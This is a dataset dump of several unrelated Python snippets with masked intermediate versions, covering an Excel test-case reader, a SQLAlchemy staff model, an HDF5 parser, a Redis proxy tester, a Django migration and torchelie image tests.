dataList.append((cellData, repsCellData))
return dataList # 返回列表
get_teacherData()
|
flexible
|
{
"blob_id": "d7dee3311e202ae50172077940fc625f1cc6836d",
"index": 1429,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_teacherData():\n excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'\n workBook = xlrd.open_workbook(excelDir, formatting_info=True)\n workSheet = workBook.sheet_by_name('3-老师模块')\n dataList = []\n for cnt in range(1, 2):\n cellData = workSheet.cell_value(cnt, 6)\n repsCellData = workSheet.cell_value(cnt, 8)\n dataList.append((cellData, repsCellData))\n return dataList\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_teacherData():\n excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'\n workBook = xlrd.open_workbook(excelDir, formatting_info=True)\n workSheet = workBook.sheet_by_name('3-老师模块')\n dataList = []\n for cnt in range(1, 2):\n cellData = workSheet.cell_value(cnt, 6)\n repsCellData = workSheet.cell_value(cnt, 8)\n dataList.append((cellData, repsCellData))\n return dataList\n\n\nget_teacherData()\n",
"step-4": "import xlrd\n\n\ndef get_teacherData():\n excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'\n workBook = xlrd.open_workbook(excelDir, formatting_info=True)\n workSheet = workBook.sheet_by_name('3-老师模块')\n dataList = []\n for cnt in range(1, 2):\n cellData = workSheet.cell_value(cnt, 6)\n repsCellData = workSheet.cell_value(cnt, 8)\n dataList.append((cellData, repsCellData))\n return dataList\n\n\nget_teacherData()\n",
"step-5": "#time:2020-11-28\n\nimport xlrd #读取库\ndef get_teacherData():\n\n excelDir = r'../data/松勤-教管系统接口测试用例-v1.4.xls'\n workBook = xlrd.open_workbook(excelDir, formatting_info=True) # 保存原样---样式\n # 2-操作对应的用例表\n workSheet = workBook.sheet_by_name('3-老师模块') # 通过表名获取\n dataList = []\n for cnt in range(1, 2): # 到第四行\n cellData = workSheet.cell_value(cnt, 6) # 取第6列 字符串类型\n repsCellData = workSheet.cell_value(cnt, 8) # 取第8列 字符串类型 预期结果\n dataList.append((cellData, repsCellData))\n return dataList # 返回列表\n\nget_teacherData()\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from app import db
class OrgStaff(db.Model):
__tablename__ = 'org_staff'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id', ondelete="CASCADE"))
invited_by = db.Column(db.Integer, db.ForeignKey('users.id', ondelete="CASCADE"))
org_id = db.Column(db.Integer, db.ForeignKey('organisations.id', ondelete="CASCADE"))
user = db.relationship("User", primaryjoin="User.id==OrgStaff.user_id")
referer = db.relationship("User", primaryjoin="User.id==OrgStaff.invited_by")
org = db.relationship("Organisation", primaryjoin="Organisation.id==OrgStaff.org_id", backref='staff')
created_at = db.Column(db.DateTime, default=db.func.now())
updated_at = db.Column(db.DateTime, default=db.func.now(), onupdate=db.func.now())
|
normal
|
{
"blob_id": "b0f92b5e4cc972aca84a29b4568e85836f155273",
"index": 3774,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass OrgStaff(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass OrgStaff(db.Model):\n __tablename__ = 'org_staff'\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\n 'CASCADE'))\n invited_by = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\n 'CASCADE'))\n org_id = db.Column(db.Integer, db.ForeignKey('organisations.id',\n ondelete='CASCADE'))\n user = db.relationship('User', primaryjoin='User.id==OrgStaff.user_id')\n referer = db.relationship('User', primaryjoin=\n 'User.id==OrgStaff.invited_by')\n org = db.relationship('Organisation', primaryjoin=\n 'Organisation.id==OrgStaff.org_id', backref='staff')\n created_at = db.Column(db.DateTime, default=db.func.now())\n updated_at = db.Column(db.DateTime, default=db.func.now(), onupdate=db.\n func.now())\n",
"step-4": "from app import db\n\n\nclass OrgStaff(db.Model):\n __tablename__ = 'org_staff'\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\n 'CASCADE'))\n invited_by = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\n 'CASCADE'))\n org_id = db.Column(db.Integer, db.ForeignKey('organisations.id',\n ondelete='CASCADE'))\n user = db.relationship('User', primaryjoin='User.id==OrgStaff.user_id')\n referer = db.relationship('User', primaryjoin=\n 'User.id==OrgStaff.invited_by')\n org = db.relationship('Organisation', primaryjoin=\n 'Organisation.id==OrgStaff.org_id', backref='staff')\n created_at = db.Column(db.DateTime, default=db.func.now())\n updated_at = db.Column(db.DateTime, default=db.func.now(), onupdate=db.\n func.now())\n",
"step-5": "from app import db\n\n\nclass OrgStaff(db.Model):\n __tablename__ = 'org_staff'\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\"CASCADE\"))\n invited_by = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\"CASCADE\"))\n org_id = db.Column(db.Integer, db.ForeignKey('organisations.id', ondelete=\"CASCADE\"))\n user = db.relationship(\"User\", primaryjoin=\"User.id==OrgStaff.user_id\")\n referer = db.relationship(\"User\", primaryjoin=\"User.id==OrgStaff.invited_by\")\n org = db.relationship(\"Organisation\", primaryjoin=\"Organisation.id==OrgStaff.org_id\", backref='staff')\n created_at = db.Column(db.DateTime, default=db.func.now())\n updated_at = db.Column(db.DateTime, default=db.func.now(), onupdate=db.func.now())\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
import h5py
class HDF5_Parser(object): # noqa: N801
"""
Examples
--------
>>> import h5py
>>> indata = h5py.File('test.hdf5')
>>> dataset = indata.create_dataset("mydataset", (10,), dtype='i')
>>> indata.close()
>>> with open('test.hdf5') as f:
... data = HDF5_Parser().read_file(f)
>>> data['mydataset'][:]
array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int32)
>>> import os
>>> os.remove('test.hdf5')
"""
plugin_name = 'hdf5.read'
plugin_descript = 'read *.hdf5 (in read mode) files using h5py'
file_regex = '*.hdf5'
def read_file(self, file_obj, **kwargs):
return h5py.File(file_obj.name, mode='r')
|
normal
|
{
"blob_id": "0beb5c5c5db9247d66a5a49cfff7282ead52a9b7",
"index": 716,
"step-1": "<mask token>\n\n\nclass HDF5_Parser(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def read_file(self, file_obj, **kwargs):\n return h5py.File(file_obj.name, mode='r')\n",
"step-2": "<mask token>\n\n\nclass HDF5_Parser(object):\n <mask token>\n plugin_name = 'hdf5.read'\n plugin_descript = 'read *.hdf5 (in read mode) files using h5py'\n file_regex = '*.hdf5'\n\n def read_file(self, file_obj, **kwargs):\n return h5py.File(file_obj.name, mode='r')\n",
"step-3": "<mask token>\n\n\nclass HDF5_Parser(object):\n \"\"\"\n\n Examples\n --------\n\n >>> import h5py\n >>> indata = h5py.File('test.hdf5')\n >>> dataset = indata.create_dataset(\"mydataset\", (10,), dtype='i')\n >>> indata.close()\n\n >>> with open('test.hdf5') as f:\n ... data = HDF5_Parser().read_file(f)\n >>> data['mydataset'][:]\n array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int32)\n\n >>> import os\n >>> os.remove('test.hdf5')\n\n \"\"\"\n plugin_name = 'hdf5.read'\n plugin_descript = 'read *.hdf5 (in read mode) files using h5py'\n file_regex = '*.hdf5'\n\n def read_file(self, file_obj, **kwargs):\n return h5py.File(file_obj.name, mode='r')\n",
"step-4": "import h5py\n\n\nclass HDF5_Parser(object):\n \"\"\"\n\n Examples\n --------\n\n >>> import h5py\n >>> indata = h5py.File('test.hdf5')\n >>> dataset = indata.create_dataset(\"mydataset\", (10,), dtype='i')\n >>> indata.close()\n\n >>> with open('test.hdf5') as f:\n ... data = HDF5_Parser().read_file(f)\n >>> data['mydataset'][:]\n array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int32)\n\n >>> import os\n >>> os.remove('test.hdf5')\n\n \"\"\"\n plugin_name = 'hdf5.read'\n plugin_descript = 'read *.hdf5 (in read mode) files using h5py'\n file_regex = '*.hdf5'\n\n def read_file(self, file_obj, **kwargs):\n return h5py.File(file_obj.name, mode='r')\n",
"step-5": "#!/usr/bin/env python\n\nimport h5py\n\n\nclass HDF5_Parser(object): # noqa: N801\n \"\"\"\n\n Examples\n --------\n\n >>> import h5py\n >>> indata = h5py.File('test.hdf5')\n >>> dataset = indata.create_dataset(\"mydataset\", (10,), dtype='i')\n >>> indata.close()\n\n >>> with open('test.hdf5') as f:\n ... data = HDF5_Parser().read_file(f)\n >>> data['mydataset'][:]\n array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int32)\n\n >>> import os\n >>> os.remove('test.hdf5')\n\n \"\"\"\n\n plugin_name = 'hdf5.read'\n plugin_descript = 'read *.hdf5 (in read mode) files using h5py'\n file_regex = '*.hdf5'\n\n def read_file(self, file_obj, **kwargs):\n return h5py.File(file_obj.name, mode='r')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Test_Proxy:
def __init__(self):
self.db = RedisClient()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Test_Proxy:
def __init__(self):
self.db = RedisClient()
def proxy_test(self, proxy):
url = TEST_URL
proxies = {'http': proxy, 'https': proxy}
try:
r = requests.get(url, proxies=proxies, timeout=5)
if r.status_code == 200:
self.db.max(proxy)
except requests.exceptions.ConnectionError:
self.db.decrease(proxy)
<|reserved_special_token_1|>
from redis_db import RedisClient
from setting import TEST_URL
import requests
class Test_Proxy:
def __init__(self):
self.db = RedisClient()
def proxy_test(self, proxy):
url = TEST_URL
proxies = {'http': proxy, 'https': proxy}
try:
r = requests.get(url, proxies=proxies, timeout=5)
if r.status_code == 200:
self.db.max(proxy)
except requests.exceptions.ConnectionError:
self.db.decrease(proxy)
<|reserved_special_token_1|>
from redis_db import RedisClient
from setting import TEST_URL
import requests
class Test_Proxy():
def __init__(self):
self.db=RedisClient()
def proxy_test(self, proxy):
url = TEST_URL
proxies={
"http":proxy,
"https":proxy
}
# print("{}(测试中)".format(proxy))
try:
r = requests.get(url, proxies=proxies, timeout=5)
if r.status_code ==200:
# print("{}(可用)".format(proxy))
self.db.max(proxy)
except requests.exceptions.ConnectionError:
self.db.decrease(proxy)
# print("{}(减一)".format(proxy))
|
flexible
|
{
"blob_id": "2cbdb828ab6e0ad44154f0c5b2a1d807fd0d2520",
"index": 8783,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Test_Proxy:\n\n def __init__(self):\n self.db = RedisClient()\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Test_Proxy:\n\n def __init__(self):\n self.db = RedisClient()\n\n def proxy_test(self, proxy):\n url = TEST_URL\n proxies = {'http': proxy, 'https': proxy}\n try:\n r = requests.get(url, proxies=proxies, timeout=5)\n if r.status_code == 200:\n self.db.max(proxy)\n except requests.exceptions.ConnectionError:\n self.db.decrease(proxy)\n",
"step-4": "from redis_db import RedisClient\nfrom setting import TEST_URL\nimport requests\n\n\nclass Test_Proxy:\n\n def __init__(self):\n self.db = RedisClient()\n\n def proxy_test(self, proxy):\n url = TEST_URL\n proxies = {'http': proxy, 'https': proxy}\n try:\n r = requests.get(url, proxies=proxies, timeout=5)\n if r.status_code == 200:\n self.db.max(proxy)\n except requests.exceptions.ConnectionError:\n self.db.decrease(proxy)\n",
"step-5": "from redis_db import RedisClient\nfrom setting import TEST_URL\nimport requests\n\nclass Test_Proxy():\n def __init__(self):\n self.db=RedisClient()\n\n def proxy_test(self, proxy):\n url = TEST_URL\n proxies={\n \"http\":proxy,\n \"https\":proxy\n }\n # print(\"{}(测试中)\".format(proxy))\n try:\n r = requests.get(url, proxies=proxies, timeout=5)\n if r.status_code ==200:\n # print(\"{}(可用)\".format(proxy))\n self.db.max(proxy)\n except requests.exceptions.ConnectionError:\n self.db.decrease(proxy)\n # print(\"{}(减一)\".format(proxy))\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
# Generated by Django 3.1.2 on 2020-10-17 15:46
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('story1', '0006_visitor'),
]
operations = [
migrations.RenameField(
model_name='visitor',
old_name='identitiy_number',
new_name='identity_number',
),
]
|
normal
|
{
"blob_id": "1aaace83af0235341d10b8ac3b47d00a944dac37",
"index": 1422,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('story1', '0006_visitor')]\n operations = [migrations.RenameField(model_name='visitor', old_name=\n 'identitiy_number', new_name='identity_number')]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('story1', '0006_visitor')]\n operations = [migrations.RenameField(model_name='visitor', old_name=\n 'identitiy_number', new_name='identity_number')]\n",
"step-5": "# Generated by Django 3.1.2 on 2020-10-17 15:46\r\n\r\nfrom django.db import migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('story1', '0006_visitor'),\r\n ]\r\n\r\n operations = [\r\n migrations.RenameField(\r\n model_name='visitor',\r\n old_name='identitiy_number',\r\n new_name='identity_number',\r\n ),\r\n ]\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-07)
<|reserved_special_token_0|>
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',
init_img=start)()
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img
=start)()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-07)
def test_spectral_image():
pi = SpectralImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(1, 3, 128, 128)
pi = SpectralImage((1, 3, 128, 128), init_img=start)
<|reserved_special_token_0|>
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',
init_img=start)()
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img
=start)()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-07)
def test_spectral_image():
pi = SpectralImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(1, 3, 128, 128)
pi = SpectralImage((1, 3, 128, 128), init_img=start)
def test_correlate_colors():
corr = CorrelateColors()
start = torch.randn(1, 3, 64, 64)
assert start.allclose(corr.invert(corr(start)), atol=1e-05)
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',
init_img=start)()
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img
=start)()
<|reserved_special_token_1|>
import torch
from torchelie.data_learning import *
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-07)
def test_spectral_image():
pi = SpectralImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(1, 3, 128, 128)
pi = SpectralImage((1, 3, 128, 128), init_img=start)
def test_correlate_colors():
corr = CorrelateColors()
start = torch.randn(1, 3, 64, 64)
assert start.allclose(corr.invert(corr(start)), atol=1e-05)
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',
init_img=start)()
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img
=start)()
<|reserved_special_token_1|>
import torch
from torchelie.data_learning import *
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-7)
def test_spectral_image():
pi = SpectralImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(1, 3, 128, 128)
pi = SpectralImage((1, 3, 128, 128), init_img=start)
def test_correlate_colors():
corr = CorrelateColors()
start = torch.randn(1, 3, 64, 64)
assert start.allclose(corr.invert(corr(start)), atol=1e-5)
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3,
128,
128,
space='spectral',
colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3,
128,
129,
space='spectral',
colors='uncorr',
init_img=start)()
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3,
128,
128,
space='pixel',
colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3,
128,
128,
space='spectral',
colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr',
init_img=start)()
|
flexible
|
{
"blob_id": "73cacc1317c8624b45c017144bc7449bc99bd045",
"index": 9542,
"step-1": "<mask token>\n\n\ndef test_pixel_image():\n pi = PixelImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(3, 128, 128)\n pi = PixelImage((1, 3, 128, 128), init_img=start)\n assert start.allclose(pi() + 0.5, atol=1e-07)\n\n\n<mask token>\n\n\ndef test_parameterized_img():\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',\n init_img=start)()\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img\n =start)()\n",
"step-2": "<mask token>\n\n\ndef test_pixel_image():\n pi = PixelImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(3, 128, 128)\n pi = PixelImage((1, 3, 128, 128), init_img=start)\n assert start.allclose(pi() + 0.5, atol=1e-07)\n\n\ndef test_spectral_image():\n pi = SpectralImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(1, 3, 128, 128)\n pi = SpectralImage((1, 3, 128, 128), init_img=start)\n\n\n<mask token>\n\n\ndef test_parameterized_img():\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',\n init_img=start)()\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img\n =start)()\n",
"step-3": "<mask token>\n\n\ndef test_pixel_image():\n pi = PixelImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(3, 128, 128)\n pi = PixelImage((1, 3, 128, 128), init_img=start)\n assert start.allclose(pi() + 0.5, atol=1e-07)\n\n\ndef test_spectral_image():\n pi = SpectralImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(1, 3, 128, 128)\n pi = SpectralImage((1, 3, 128, 128), init_img=start)\n\n\ndef test_correlate_colors():\n corr = CorrelateColors()\n start = torch.randn(1, 3, 64, 64)\n assert start.allclose(corr.invert(corr(start)), atol=1e-05)\n\n\ndef test_parameterized_img():\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',\n init_img=start)()\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img\n =start)()\n",
"step-4": "import torch\nfrom torchelie.data_learning import *\n\n\ndef test_pixel_image():\n pi = PixelImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(3, 128, 128)\n pi = PixelImage((1, 3, 128, 128), init_img=start)\n assert start.allclose(pi() + 0.5, atol=1e-07)\n\n\ndef test_spectral_image():\n pi = SpectralImage((1, 3, 128, 128), 0.01)\n pi()\n start = torch.randn(1, 3, 128, 128)\n pi = SpectralImage((1, 3, 128, 128), init_img=start)\n\n\ndef test_correlate_colors():\n corr = CorrelateColors()\n start = torch.randn(1, 3, 64, 64)\n assert start.allclose(corr.invert(corr(start)), atol=1e-05)\n\n\ndef test_parameterized_img():\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',\n init_img=start)()\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',\n init_img=start)()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr', init_img\n =start)()\n",
"step-5": "import torch\nfrom torchelie.data_learning import *\n\n\ndef test_pixel_image():\n pi = PixelImage((1, 3, 128, 128), 0.01)\n pi()\n\n start = torch.randn(3, 128, 128)\n pi = PixelImage((1, 3, 128, 128), init_img=start)\n\n assert start.allclose(pi() + 0.5, atol=1e-7)\n\n\ndef test_spectral_image():\n pi = SpectralImage((1, 3, 128, 128), 0.01)\n pi()\n\n start = torch.randn(1, 3, 128, 128)\n pi = SpectralImage((1, 3, 128, 128), init_img=start)\n\n\ndef test_correlate_colors():\n corr = CorrelateColors()\n start = torch.randn(1, 3, 64, 64)\n assert start.allclose(corr.invert(corr(start)), atol=1e-5)\n\n\ndef test_parameterized_img():\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n ParameterizedImg(1, 3,\n 128,\n 128,\n space='spectral',\n colors='uncorr',\n init_img=start)()\n\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()\n\n start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3,\n 128,\n 129,\n space='spectral',\n colors='uncorr',\n init_img=start)()\n start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)\n ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()\n ParameterizedImg(1, 3,\n 128,\n 128,\n space='pixel',\n colors='uncorr',\n init_img=start)()\n\n ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()\n ParameterizedImg(1, 3,\n 128,\n 128,\n 